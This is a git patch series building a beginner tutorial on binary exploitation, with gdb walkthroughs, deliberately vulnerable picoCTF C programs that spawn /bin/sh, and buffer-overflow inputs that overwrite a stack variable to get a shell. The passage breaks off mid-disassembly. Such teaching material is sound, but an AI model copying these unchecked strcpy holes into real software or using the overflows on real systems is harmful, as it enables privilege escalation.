From 7268a45ac513fc162ef6fa7cb6471079736f3a5d Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 00:19:22 +0000 Subject: [PATCH 01/16] Changes to be committed: modified: README.md --- README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index cedb6f6..2cea0b7 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,10 @@ # how2exploit_binary -An in depth tutorial on how to do binary exploitation +Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been +looking for a place to start learning binary exploitation, then you're in luck. +Written by someone who is just barely better than "incompetent," I'll be +explaining how I learned my skills. These tutorials will be a bit long winded, +but hopefully they will be informative and entertaining. Please feel free to +contact me about any clarifications that should be included in the tutorials. + +-Best of luck +bert88sta From 7a1c0a911ab570cef0abc9259edc69b7a6e3982e Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 00:20:19 +0000 Subject: [PATCH 02/16] Changes to be committed: modified: README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 2cea0b7..c1072b9 100644 --- a/README.md +++ b/README.md @@ -7,4 +7,5 @@ but hopefully they will be informative and entertaining. Please feel free to contact me about any clarifications that should be included in the tutorials. -Best of luck + bert88sta From 73ff1a5845bd09ea757b46aed0bbb7a95fcc71d0 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 00:45:44 +0000 Subject: [PATCH 03/16] Changes to be committed: modified: README.md new file: intro-1/README.md new file: intro-1/hello_world.bin new file: intro-1/hello_world.c --- README.md | 8 +++++++- intro-1/README.md | 23 +++++++++++++++++++++++ intro-1/hello_world.bin | Bin 0 -> 7342 bytes intro-1/hello_world.c | 5 +++++ 4 files changed, 35 insertions(+), 1 deletion(-) create mode 100644 intro-1/README.md create mode 100755 intro-1/hello_world.bin create mode 100644 intro-1/hello_world.c diff --git a/README.md b/README.md index c1072b9..37b963b 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -# how2exploit_binary +### A note from the creator Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been looking for a place to start learning binary exploitation, then you're in luck. Written by someone who is just barely better than "incompetent," I'll be @@ -6,6 +6,12 @@ explaining how I learned my skills. These tutorials will be a bit long winded, but hopefully they will be informative and entertaining. Please feel free to contact me about any clarifications that should be included in the tutorials. +**This is intended for linux. It's free if you don't already have it.** + -Best of luck bert88sta + +#how2exploit_binary + +[Intro 1: What is a binary, really?](intro-1) diff --git a/intro-1/README.md b/intro-1/README.md new file mode 100644 index 0000000..26fbe0e --- /dev/null +++ b/intro-1/README.md @@ -0,0 +1,23 @@ +#Intro 1: What is a binary, really? + +In short, a binary is what happens when you take high level code such as C or +C++, and compile it into something the computer can actually run. I believe in +hands on learning, so we can take a look inside one to really find out. + +Consider the file [hello_world.c](hello_world.c): +```C +#include +int main() { + printf("Hello World!\n"); +} +``` + +This is your average C file, more or less. It's got a main, some includes, and +a little bit of code to be run. However, your computer can't actually run it. +In order to make it usable, we can run: +``` +gcc -m32 hello_world.c -o hello_world.bin +``` +You can ignore the `-m32` argument (you'll learn about it later), but the +`-o hello_world.bin` simply specifies what the name of the output file is. + diff --git a/intro-1/hello_world.bin b/intro-1/hello_world.bin new file mode 100755 index 0000000000000000000000000000000000000000..a46ce9e8a4e9bcc863c231b8d2a618e36ef5d020 GIT binary patch literal 7342 zcmeHMYiwLc8J)XcyW4iX*(7do6PGN+QPZlvv5gxgttz~J*1@mZP6AY9vi7dMOZQ>z z-firvK*JIm6D(N;iGWZ6At51(WQkB&rK%D(j|PG;72*#+Fpx?%1d+DjS}4tO&Ye5X zb(2a(;-_cz-I+7rnb$Yp%+8(rrS|R)!!U#n9#JNULItm{3Gu{6rD+l&ai`cNJ}S0} z3S?2&^c*;l5DHMrk>`b!L56^bj(L5Q&A=4ukZlVhAyAg`Dhg6qUIdliw?PQs_q;wz zH44>0*e>-RL{-pNK}T5xrclo|C~@%PXq(aoOwqdjH?8Obz`|F&KFUMTQMCRE=mBpD ztRKyb0qEWRTR|R$RY-)8W#|3$Q-3|fv^#8dflWv^xNr#R z?Ji9H-H^+$2iw>vU|@`6g#F(mWLKZeSG&C|d=W+#g>$|qi>ziflpgk?WND`lPiB^OvgSCGOA9Dk z+Q}B;)Gf{1m@UOQRZC}p8~$;4>d%EM*ZPMB;Vi-Oon>d`(H-AB5 z;i9qc-Ta>l=W3ojEI(KLd*zHfyo2erec&6Y`B<@)EppPiZVdR*`FSPQO!S}g)_$CN>VAVZK7v?;1HR*)mdf(M^Qc9Ly~sKOnTI}t zSn0z7|MO+7f#6rY;XqZPyf;wqc|1@RE(U_(3ju%lV!#(ZAMnx{zYFoApI8d(Vci1j z7Ff5yx&_uPux^2M3#?n<|6qY@c;B6euqqt+Z1E$W{j%4G7Zhj{Sdxi@ho=_gn?&Pfs;AUbbJTo`IE2P zJU^a7d8TI&^WBUc<2y8C93eB~$j5Oo!@gcaJPM5D{~Y-KtP3rpjtbadi(?1oceb`Z z654fOIG?uip(b;$*;Lnv94jC!&Mx-qM5nLloc69Y-Lp( z*QrF>ie<-zna)@-Gu+ZuXGO*wG?vbr!}$c>sS{CQ62&9AxGhjTe$j$~4)SlZI|{xC6pjdM&NvF}p==m$Db$FKu( z2ZTKP-UEsd(mK#T8F&Yvc_-kTe7~u+HR_>xZGg-0E7nJ!e#xoNzIQ+#d6ZrV{hB=b z`epF?k*4n>X>;iF2O;!#^0+o?kl>oofn0{e5c)NF^yyI~xPElI%%?mB;W}WNYhfIT z5Yp~;0mU>#K!>|HjKKsX8m=Jhchb+4e#_u`ldIALU`c%?> zvMmb#6IhoH8SpBoaDq-U=A7xUYl{%|Xc%{9q7K47ps4Nh?)pBBKedCdg1SCXZwcIw zn5k}z)xM*!s(|~8!m0)CBMK`EaKBJktw!z(3Ufx)`d64cmRjcu+cbMUE6kOv{xcQk zj-l44!rY;7-@95rS2S$w{LhsM{==*Pc*bS6C#&_NFq{Q}>qKE%POS%pIV;NV73M#- zIvXggc5M2w!fNH}|K2iZh0-sT9+SmD|3fIVPXzG8RjfRc{-pFgncNIzV(Y43G1n{J zDsjZReFHlOOB`{=@4@&@;29SV1MBk;^@o7j9{s^U=~2X7zleZ0i)q9>LlKkzZN%IM zhz+qx%rW5v_Q&m4#228O!~Q~w0WbeOVt0R;uLJoD0J?pF`riW9_B3G6{{ZXusjp;% zj=c=na|bZ*bLpwjich#Y6hdAfa6iUFPu=9H6ft0J{}6VBabRu#An;LO?#rN~zJU0G zi%Q!QQwcHhOHckx;NFTlKtjv&qczYSdLln-Kl-UZhF zP5ljE{vU8WyxT9wz;E{dUa=9FciKFAlD|bQVIc4z54!m5-=6pB`+@m?Nd6|C2u8A2 z&dQIDnj`ouu)lRcc6SX9NhzYSY-}u%!%a8n=C1#89A2B3`deOYGtxH z8OcuwoS?>&F)J1|_dL9>0X5%-BzcxoCo_rDR(4XTvs^TvN=>4O3rQXU*HGiUKbA*% ze{A=>V<6nqF57$C&~-HqonBKkDrDPddc!?ktzfw{_Qw$+JG=W@!rij3qhqjrNDhTt zy4zWu{rzMlm$!S2Z!AMS@}_x)dRl3mp~!GD2JXb(J?2=xg6$RN{m!nm?qH9u+{)}8~+6-GJg92 literal 0 HcmV?d00001 diff --git a/intro-1/hello_world.c b/intro-1/hello_world.c new file mode 100644 index 0000000..1d159d3 --- /dev/null +++ b/intro-1/hello_world.c @@ -0,0 +1,5 @@ +#include + +int main() { + printf("Hello World!\n"); +} From 46e24947ea80f4655ea2ed33b07fe97a940a48e3 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 01:15:50 +0000 Subject: [PATCH 04/16] Changes to be committed: modified: ../README.md modified: README.md --- README.md | 3 ++- intro-1/README.md | 61 ++++++++++++++++++++++++++++++++++++++++++++++- 2 files changed, 62 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37b963b..ffce166 100644 --- a/README.md +++ b/README.md @@ -6,7 +6,8 @@ explaining how I learned my skills. These tutorials will be a bit long winded, but hopefully they will be informative and entertaining. Please feel free to contact me about any clarifications that should be included in the tutorials. -**This is intended for linux. It's free if you don't already have it.** +**This is intended for linux. It's free if you don't already have it. Don't +want to dual boot? Get a VM.** -Best of luck diff --git a/intro-1/README.md b/intro-1/README.md index 26fbe0e..0d2f40a 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -16,8 +16,67 @@ This is your average C file, more or less. It's got a main, some includes, and a little bit of code to be run. However, your computer can't actually run it. In order to make it usable, we can run: ``` -gcc -m32 hello_world.c -o hello_world.bin +$ gcc -m32 hello_world.c -o hello_world.bin ``` You can ignore the `-m32` argument (you'll learn about it later), but the `-o hello_world.bin` simply specifies what the name of the output file is. +From here, we can execute it: +``` +$ ./hello_world.bin +Hello World! +``` +Unsurprisingly, we get "Hello World!" as the output. But let's go a bit deeper. +We can open gdb (GNU Debugger) and see what's happening under the hood: +``` +$ gdb -q ./hello_world.bin +Reading symbols from ./hello_world.bin...(no debugging symbols found)...done. +gdb-peda$ disas main +Dump of assembler code for function main: + 0x0804841d <+0>: push %ebp + 0x0804841e <+1>: mov %esp,%ebp + 0x08048420 <+3>: and $0xfffffff0,%esp + 0x08048423 <+6>: sub $0x10,%esp + 0x08048426 <+9>: movl $0x80484d0,(%esp) + 0x0804842d <+16>: call 0x80482f0 + 0x08048432 <+21>: leave + 0x08048433 <+22>: ret +End of assembler dump. +gdb-peda$ quit +``` +Firstly, your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. +Don't worry about this, my gdb is modified. + +The weird stuff that gdb showed us is called assembly language. It's +essentially the lowest level human readable code out there. Each line of that +code maps one to one with a machine instruction. Let me break this down for +you. + +``` +0x0804841d <+0>: push %ebp +0x0804841e <+1>: mov %esp,%ebp +0x08048420 <+3>: and $0xfffffff0,%esp +0x08048423 <+6>: sub $0x10,%esp +``` +First, the nummbers you see on the right are addresses. Just like your house +address, `0x0804841d` is where the instruction ` push %ebp` lives. These +first four instructions are just conventions for a function, in this case +`main()`. + +``` +0x08048426 <+9>: movl $0x80484d0,(%esp) +0x0804842d <+16>: call 0x80482f0 +``` + +These instructions are what actually prints out our "Hello World!". The program +moves the address of the string "Hello World!" into the memory that `%esp` +points to. `%esp` is a register. It holds four bytes of information for quick +access, usually some address. Our program then calls `puts()`, which prints out +whatever is at the address we supplied. +``` +0x08048432 <+21>: leave +0x08048433 <+22>: ret +``` + +Finally, these last two just pass control from our `main()` back to the C +library, which does some cleaning up and then exits. From 59adf3127c5d4d3780a817182f78b8abb69b6abe Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 01:16:48 +0000 Subject: [PATCH 05/16] modified: README.md --- intro-1/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/intro-1/README.md b/intro-1/README.md index 0d2f40a..6774c53 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -58,7 +58,7 @@ you. 0x08048420 <+3>: and $0xfffffff0,%esp 0x08048423 <+6>: sub $0x10,%esp ``` -First, the nummbers you see on the right are addresses. Just like your house +First, the numbers you see on the right are addresses. Just like your house address, `0x0804841d` is where the instruction ` push %ebp` lives. These first four instructions are just conventions for a function, in this case `main()`. From ff20d00ae32839201ac9bde568144beee93a45a3 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 01:45:59 +0000 Subject: [PATCH 06/16] Changes to be committed: modified: README.md --- intro-1/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/intro-1/README.md b/intro-1/README.md index 6774c53..0bb35b7 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -79,4 +79,5 @@ whatever is at the address we supplied. ``` Finally, these last two just pass control from our `main()` back to the C -library, which does some cleaning up and then exits. +library, which does some cleaning up and then exits. We'll be learning more +about how these binaries function in later tutorials. From 95446e9676b03e8b1af812bba6ade87d7b015070 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 02:25:40 +0000 Subject: [PATCH 07/16] Changes to be committed: modified: README.md new file: intro-2/README.md new file: intro-2/overflow1-3948d17028101c40 new file: intro-2/overflow1-3948d17028101c40.c --- README.md | 5 +++++ intro-2/README.md | 5 +++++ intro-2/overflow1-3948d17028101c40 | Bin 0 -> 9547 bytes intro-2/overflow1-3948d17028101c40.c | 32 +++++++++++++++++++++++++++ 4 files changed, 42 insertions(+) create mode 100644 intro-2/README.md create mode 100644 intro-2/overflow1-3948d17028101c40 create mode 100644 intro-2/overflow1-3948d17028101c40.c diff --git a/README.md b/README.md index ffce166..e67471d 100644 --- a/README.md +++ b/README.md @@ -15,4 +15,9 @@ bert88sta #how2exploit_binary +##Introductory tutorials: + [Intro 1: What is a binary, really?](intro-1) +[Intro 2: SEGFAULT is your friend.](intro-2) + +#TODO diff --git a/intro-2/README.md b/intro-2/README.md new file mode 100644 index 0000000..8cfd9eb --- /dev/null +++ b/intro-2/README.md @@ -0,0 +1,5 @@ +#Intro 2:SEGFAULT is your friend. + +**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used +here.** + diff --git a/intro-2/overflow1-3948d17028101c40 b/intro-2/overflow1-3948d17028101c40 new file mode 100644 index 0000000000000000000000000000000000000000..61a465c9a0cdf4990b8818dc900ae9abb51f0a2a GIT binary patch literal 9547 zcmeHNe{3Abb)MZ@iYt*kQ6eMDF=MZtV?rhJk#s0RKjK=HNXfJrNtQ?liej&icgwr0 zj(3N!8!(A7BufH=5z8i3mI^^)e$lGr z?aPH||4Yjzbs$p&M7xxmU|o=RK}LEFm_#{kkW$c3!8U0Sn51R9e(fi|X$$eqW0p;- zmp=eG)ISs&k-{=|Ltb0I%SaMgDT^1RXKN(AB#rBcmEnD5YqOvI_W|sQn*r-3Y*}xyij>OQKPPb5_ zsGzulIk-o)#R8|9pspg4msX~2>CK0_LMK% z724Q$_}tD8A!f_(SF6<{^L|66gw)C|*sA;s43uB8_no7n5Y=_>qBhme_wkgtleJ1Q zdhwUYUF~G;Qj}f1ATev1V$&|pOU&A)I3+Khl9;tlIm9O=X6;j5#B&m}6)E=L#X}Oa zHL3N)d5PJo)MnyGBxdVU_Y&^{?tS~=nO~LPy0U9@cWMrEA?4ulz=Nq%U%|TY9VlF# zTNK7-evNLi4&B{@Vnpel=la0UIB4zROC5N=@Sa(|WNdh&c2-B(;esXS3 z=^*6_>RNg8gKG8S%TSvgYJTCDW@yNswN-TH#n702`h6(Pj7032(TFu;MJkU%zx;T! zD7Bn!!s5fEB$5_#kF}Oxv^HFT{Ek4ry;i4hfoN^5Xck%jLuK6_$eTYTw`I|z zf&B9SRI6wSW*g=cbXl|Ie>z{DY&M>pUw)(uBY+mqsWzu(hwPc5tElSCV8l8;^nF(T zb(C-%>4OpbRitvi2qZs4d8cDAG&^=xxBf9`mmj}slx~GGXQ5!G{ZK+JvS5`rp>e4h z=l~J*5vO8h4srJVTUW}Lo$}+h>9;|2lxkxTo#wlGX-j1d;;2o>EQqxVxFtC%d=YOE znoyp%W(C`!i@zCdmE$cN9L&10FFv@Zl19OY&;31Kit^=-*-WJ8_!$Svm3=7bc$v{P zuf9+|Hr63@-mt{1nVvX!5re!<$neZ|0< zwa1Ue_dAKwWPYRQndpW5rm~+vs5BkMDPL2fV_;LfZG7eOT!q62>i|O`B1F?!Rl_t5&}ZK8L0q0)G;N zeG;7W{4Drm;6Dey489r@;y2)H!MV3G7?182#$&c|OS5GiL%M@BEUn_T|E^X~fs3%c zE!=$H@+RM!68C(3(`W9A+(G$fkPVx^1s4Nh`-r)vrNMmrWfUX#??;gQbI6a?$`NPY z$3XX@o)fh)b6nQn16L3 zY`x4y`wh@}IZED zJqVfr9RO+l?OV5Qbh^gIOIg3vJ(AAG3OT1Q+8_PgoxLTQxNeQYa_3XKlG=y*j##$b zJ%ggSGn&$GSMn~L_+ zGisg?FlK~0W!!4~R*l3KORWRI;(iR5DbD~wJ6=R0+rb8}!W8-%;-;#+sVZ-($|I4L zHw{^N)0CADsmhzG@}{c1^#kf1mG!WKcCgQom2I*94v)|S2|Sk=zrfS54O*v@#RJH% zK#l%n9_hR@K(iWg@B(53%oCQ4L!2;{Dp|(H$xs-}m??DP`6t9uTH?qqqy2kClkp>P zW0gUDnqVVo`(E@!^IK9Dm}%yK8>=XQnU;%09c4UCzawn?BjG2gYAol-$nG>&7@gs^ zrcn5n@Csw4(TW$&TqQ!`jZK@HhViz9BBH734(TJwnMhv$tG^2TOGg?qk&@F66cp=+x+vl;4Er*LB#8*M4;8l=eyccf4Q{Dz* zM2zlIu^{iVlJR)=)cSt6zfaw1-I>gmy7AU`r?c@)Dd7o0hl2Mi@%_;_OT}eP!kdVu z zDaGj`%%&&v8E?UXP?hng^IlQaMMq6mvccp_aC0(c-)^6~Gtp zy|O-;9GoHf;EGX9KkB*u;>LETa+6+nKA-Q-r{lS}KXF%2@8`Pnh1__?n=I1di51db zv0J$|%Bd0y#g?+gbTSLiiRE7d@)`@*fX>!nF)gNY1>dI_)N|cJh3ymhGvnWq-tanlZ-?Ny`WfuV#vVxbPzKY~CzKEu? zxPFZK-V~k_01)L8F+V1vUdo*)#3nsAl|W97L^ST_3PqSx><{A*qR7}}Iu3I=6oW@p zmaWPeFG4$>o21tbRd2kMbYq2BHtDex3Den$oQ}uF#|z#8jd1(y={Q&OAVVf6Ur==H z?-g!=mKxRIJ|BQfp$?QWd=f@j^Ug{A3UO!z_s2W;_u*$ z!}55(dOj$xA<(5BX$J^vqO{9%*Lmp81M?h)sMKi%e-OkO%<_0ndkPVr&vc+J!^0q+ zv8c!M)iPw_I;rh4owOgsGa2JNmqnoGAYN-1P&^7+3ZmX1^ai2F*FcxYHV~IVT94=1cK(7M5vswvU>wODxttY?3pc4kKqxbz9y$Wyo z*jdaN1YO>bftk#z^M;JyXQ--!)_WNVT8|gP9Uq~0zDAE1zY*x^GFYaL{{!M23)+?6 zqoDU%kOn68SdTYB+AhBrT)9qpEK{D&z*!#sgsaf&LtF>ykSZWuUKeh%yD(7KYcE$& zrn5ZWc=vpS-tU6)dcYZ|_ZbzHPue2AA8?t7$CseDSp#tDFf<{eGT zcRKtH^tNju5_Ockrg`G&Pr&cPOa4iubNo1F=mPnU*OvEJcL?!~nvA+UsD3E$TPhRP z7h1K>Dy$0NdaAIpz;#n$T33Fl!fN&5I;b#buv+gF<_fLWHHD>`T)!0NN~Qc&g>k$@ z;CiGmS7af$?kLO^OvrD_3e$U5{N8C>-HPip}T-}`wiSOtOGt3 z`0=J_5%&YjFJRz?xLJG&oZrbfQ;1XGtvIxUVP3;6U?d2%?<2mt#{Oa8w`O#GR){|a zuC-5R`eZP^EbqI(Id;w-SPPb=#4lREu>uE7rSRBABGe;0UdFn?E= ztKsV`{?^{EmJDdJzC!c@^V4fg;ubMbCm#h~AC$-T?gi#~LFI1|j{x)i<^18d{A6AJ zDd5`vdJ>p-0~3M0nHqfuY0m=d^<*Vac=3W?^zlgwE}iRc9o@Ox9U0y;ieCx1?%*PH z-_{yYBIhPEx$#)Wm4|LOR+|y+pLXcijd-ftyZD0rmF^b#8}mH94*A4DA?{ zX147f_`;B@5zXlMf)#nfmsS?sGt~GxPMGV`f536R5SwfnN zV*wuB_K}@i21eYS+qUf)8g)kpwu}t1L@HZu91a-!-7L{`LJ)`~W2`)&n0T}NVm}Sq!XfwUTBT}F-5ID+zb33qc$ZNlxrPSV-3I5 zSgg6|Hy`{>$6|4!m~&IHY$D^;{|w|qKj&DS@ml9dM=khq$RZWl?LiMu^@xSUhAZh>r literal 0 HcmV?d00001 diff --git a/intro-2/overflow1-3948d17028101c40.c b/intro-2/overflow1-3948d17028101c40.c new file mode 100644 index 0000000..ca8013f --- /dev/null +++ b/intro-2/overflow1-3948d17028101c40.c @@ -0,0 +1,32 @@ +#include +#include +#include +#include +#include +#include "dump_stack.h" + +void vuln(int tmp, char *str) { + int win = tmp; + char buf[64]; + strcpy(buf, str); + dump_stack((void **) buf, 23, (void **) &tmp); + printf("win = %d\n", win); + if (win == 1) { + execl("/bin/sh", "sh", NULL); + } else { + printf("Sorry, you lose.\n"); + } + exit(0); +} + +int main(int argc, char **argv) { + if (argc != 2) { + printf("Usage: stack_overwrite [str]\n"); + return 1; + } + + uid_t euid = geteuid(); + setresuid(euid, euid, euid); + vuln(0, argv[1]); + return 0; +} From 18a0df72c8dae91e2aa12ba2f9cd4a851c76e695 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 02:27:35 +0000 Subject: [PATCH 08/16] modified: README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e67471d..d7d952b 100644 --- a/README.md +++ b/README.md @@ -17,7 +17,7 @@ bert88sta ##Introductory tutorials: -[Intro 1: What is a binary, really?](intro-1) -[Intro 2: SEGFAULT is your friend.](intro-2) +* [Intro 1: What is a binary, really?](intro-1) +* [Intro 2: SEGFAULT is your friend.](intro-2) #TODO From a1b54c09e11243f892170b61e5642a31f82012d2 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 03:03:29 +0000 Subject: [PATCH 09/16] Changes to be committed: modified: README.md modified: overflow1-3948d17028101c40 --- intro-2/README.md | 160 ++++++++++++++++++++++++++++- intro-2/overflow1-3948d17028101c40 | Bin 2 files changed, 159 insertions(+), 1 deletion(-) mode change 100644 => 100755 intro-2/overflow1-3948d17028101c40 diff --git a/intro-2/README.md b/intro-2/README.md index 8cfd9eb..e5faead 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -1,5 +1,163 @@ -#Intro 2:SEGFAULT is your friend. +#Intro 2:Screwing aroung with the stack. **Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** +Now that you've gotten your feet wet with binaries, it's time to dive in +headfirst. Consider the file [overflow1.c]() +```C +#include +#include +#include +#include +#include +#include "dump_stack.h" + +void vuln(int tmp, char *str) { + int win = tmp; + char buf[64]; + strcpy(buf, str); + dump_stack((void **) buf, 23, (void **) &tmp); + printf("win = %d\n", win); + if (win == 1) { + execl("/bin/sh", "sh", NULL); + } else { + printf("Sorry, you lose.\n"); + } + exit(0); +} + +int main(int argc, char **argv) { + if (argc != 2) { + printf("Usage: stack_overwrite [str]\n"); + return 1; + } + + uid_t euid = geteuid(); + setresuid(euid, euid, euid); + vuln(0, argv[1]); + return 0; +} +``` +You can tell just by reading through it that the obvious objective here is to +make `win==1` a true statement, but we're going to ignore that for a few +minutes to learn about the stack. The stack is dynamic memory that the program +uses to store addresses, arguments, and all sorts of other goodies. For +example: +``` +$ ./overflow1-3948d17028101c40 +Usage: stack_overwrite [str] +$ ./overflow1-3948d17028101c40 AAAA +Stack dump: +0xffd48bf4: 0xffd4a89b (second argument) +0xffd48bf0: 0x00000000 (first argument) +0xffd48bec: 0x0804870f (saved eip) +0xffd48be8: 0xffd48c18 (saved ebp) +0xffd48be4: 0xf7720000 +0xffd48be0: 0xf762caa7 +0xffd48bdc: 0x00000000 +0xffd48bd8: 0xffd48c44 +0xffd48bd4: 0xf7744500 +0xffd48bd0: 0xffd48c18 +0xffd48bcc: 0x00000000 +0xffd48bc8: 0x00000000 +0xffd48bc4: 0xf7720000 +0xffd48bc0: 0xffffffff +0xffd48bbc: 0xf760b216 +0xffd48bb8: 0x000000c2 +0xffd48bb4: 0xf757f698 +0xffd48bb0: 0xf7751938 +0xffd48bac: 0xf762cad4 +0xffd48ba8: 0x000003e8 +0xffd48ba4: 0x000003e8 +0xffd48ba0: 0xffd48c00 +0xffd48b9c: 0x41414141 (beginning of buffer) +win = 0 +Sorry, you lose. +``` +Now if you know a thing or two about ASCII, you'll know that 0x41 is the value +of "A". At the bottom of the stack dump, you'll notice that the beginning of +the buffer contains 0x41414141, or our four A's. Now we can run it again, only +this time we'll put a few more. Pay attention to the addresses on the left :) +``` +/overflow1-3948d17028101c40 $(python -c 'print "A"*76') +Stack dump: +0xfff577d4: 0xfff58853 (second argument) +0xfff577d0: 0x00000000 (first argument) +0xfff577cc: 0x0804870f (saved eip) +0xfff577c8: 0xfff57700 (saved ebp) +0xfff577c4: 0x41414141 +0xfff577c0: 0x41414141 +0xfff577bc: 0x41414141 +0xfff577b8: 0x41414141 +0xfff577b4: 0x41414141 +0xfff577b0: 0x41414141 +0xfff577ac: 0x41414141 +0xfff577a8: 0x41414141 +0xfff577a4: 0x41414141 +0xfff577a0: 0x41414141 +0xfff5779c: 0x41414141 +0xfff57798: 0x41414141 +0xfff57794: 0x41414141 +0xfff57790: 0x41414141 +0xfff5778c: 0x41414141 +0xfff57788: 0x41414141 +0xfff57784: 0x41414141 +0xfff57780: 0x41414141 +0xfff5777c: 0x41414141 (beginning of buffer) +win = 1094795585 +Sorry, you lose. +``` +This bit: `$(python -c 'print "A"*76')` just makes python print out 76 "A"s. +Now you'll notice that the addresses on the left are completely different than +the first run. This is normal. Most binaries these days have ASLR enabled, a +protection that randomizes stack addresses from run to run. However, you might +notice that `win = 1094795585` according to the stack dump. What just happened? + +Back to the source: +```C +char buf[64]; +strcpy(buf, str); +``` +Our buffer only holds 64 bytes. However, `strcpy()` is a dangerous function. +The buffer we provide contains 76 bytes. `strcpy()` doesn't care about checking +lengths. Instead, those extra 12 bytes that don't fit just get thrown onto the +stack. The value of `win` was stored right next to our buffer, so let's try to +set `win=1.` This is where things get a bit tricky. "1", as in the string, is +0x30. We need to submit 0x1, which isn't printable. Since `win` is right next +to our buffer on the stack, we can just submit 64 "A"s, followed by one "\x01" +to leak into the last byte of `win`. +``` +$ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"') +Stack dump: +0xffe29f04: 0xffe2b85e (second argument) +0xffe29f00: 0x00000000 (first argument) +0xffe29efc: 0x0804870f (saved eip) +0xffe29ef8: 0xffe29f28 (saved ebp) +0xffe29ef4: 0xf7760000 +0xffe29ef0: 0xf766caa7 +0xffe29eec: 0x00000001 +0xffe29ee8: 0x41414141 +0xffe29ee4: 0x41414141 +0xffe29ee0: 0x41414141 +0xffe29edc: 0x41414141 +0xffe29ed8: 0x41414141 +0xffe29ed4: 0x41414141 +0xffe29ed0: 0x41414141 +0xffe29ecc: 0x41414141 +0xffe29ec8: 0x41414141 +0xffe29ec4: 0x41414141 +0xffe29ec0: 0x41414141 +0xffe29ebc: 0x41414141 +0xffe29eb8: 0x41414141 +0xffe29eb4: 0x41414141 +0xffe29eb0: 0x41414141 +0xffe29eac: 0x41414141 (beginning of buffer) +win = 1 +$ ls +overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md +$ exit +``` + +If you try this for yourself, you'll get a shell. You sucessfully have +manipulated the stack to give you what you want. diff --git a/intro-2/overflow1-3948d17028101c40 b/intro-2/overflow1-3948d17028101c40 old mode 100644 new mode 100755 From 6e174196848537e8f834fa041d7f980e732a8ca8 Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 03:04:56 +0000 Subject: [PATCH 10/16] Changes to be committed: modified: README.md modified: intro-2/README.md --- README.md | 2 +- intro-2/README.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d7d952b..5a0133d 100644 --- a/README.md +++ b/README.md @@ -18,6 +18,6 @@ bert88sta ##Introductory tutorials: * [Intro 1: What is a binary, really?](intro-1) -* [Intro 2: SEGFAULT is your friend.](intro-2) +* [Intro 2: Screwing around with the stack](intro-2) #TODO diff --git a/intro-2/README.md b/intro-2/README.md index e5faead..6e18907 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -1,4 +1,4 @@ -#Intro 2:Screwing aroung with the stack. +#Intro 2: Screwing aroung with the stack. **Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** From 68ee48e2f917b266bbfb0bf4adb0909be4375eef Mon Sep 17 00:00:00 2001 From: Bret Date: Tue, 15 Mar 2016 17:49:18 +0000 Subject: [PATCH 11/16] Changes to be committed: new file: README.md new file: overflow2 new file: overflow2.c --- overflow-1/README.md | 94 +++++++++++++++++++++++++++++++++++++++++ overflow-1/overflow2 | Bin 0 -> 7504 bytes overflow-1/overflow2.c | 21 +++++++++ 3 files changed, 115 insertions(+) create mode 100644 overflow-1/README.md create mode 100755 overflow-1/overflow2 create mode 100644 overflow-1/overflow2.c diff --git a/overflow-1/README.md b/overflow-1/README.md new file mode 100644 index 0000000..9766299 --- /dev/null +++ b/overflow-1/README.md @@ -0,0 +1,94 @@ +#The power of SEGFAULT + +Consider our file for this exercise [overflow2.c](overflow2.c): +```C +#include +#include +#include + +/* This never gets called! */ +void give_shell(){ + gid_t gid = getegid(); + setresgid(gid, gid, gid); + system("/bin/sh -i"); +} + +void vuln(char *input){ + char buf[16]; + strcpy(buf, input); +} + +int main(int argc, char **argv){ + if (argc > 1) + vuln(argv[1]); + return 0; +} +``` + +Looking at the code for this program, you'll see they used `strcpy()` on our +argument. There are no size checks so we can easily try to overflow onto the +stack like before. You'll notice that there is no way `give_shell()` gets +called. Not yet at least ;) +``` +$ ./overflow2 $(python -c 'print "A"*24') +Segmentation fault (core dumped) +``` + +Segmentation fault? What's this? Simply put, a segmentation fault simply means +that the program tried to access an address that isn't there. Let's use +`strace` to see what's really happening. +``` +$ strace ./overflow2 $(python -c 'print "A"*32') +... +... +--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- +``` +The address in question is 0x41414141, our four "A"s. What does this mean? +Consider the disassembly of the function `vuln()`, as well as `main()` where +it's called. +``` +$ gdb -q ./overflow2 +Reading symbols from ./overflow2...(no debugging symbols found)...done. +gdb-peda$ disas main +... + 0x08048516 <+26>: call 0x80484e2 + 0x0804851b <+31>: mov 